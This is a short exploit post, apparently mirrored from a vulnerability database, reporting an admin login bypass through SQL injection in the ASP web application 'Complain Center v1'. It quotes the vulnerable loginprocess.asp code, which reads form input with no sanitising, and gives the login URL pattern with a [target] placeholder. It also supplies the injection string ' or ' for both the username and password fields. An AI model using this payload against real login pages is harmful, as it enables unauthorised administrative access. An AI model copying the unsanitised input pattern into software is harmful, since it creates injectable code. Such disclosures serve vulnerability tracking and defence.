Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14300
HistorySep 18, 2006 - 12:00 a.m.

Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

2006-09-1800:00:00
vulners.com
21

ENGLISH

Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

Author : ajann

Exploit;

[CODE]

loginprocess.asp:


dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

ajann,Turkey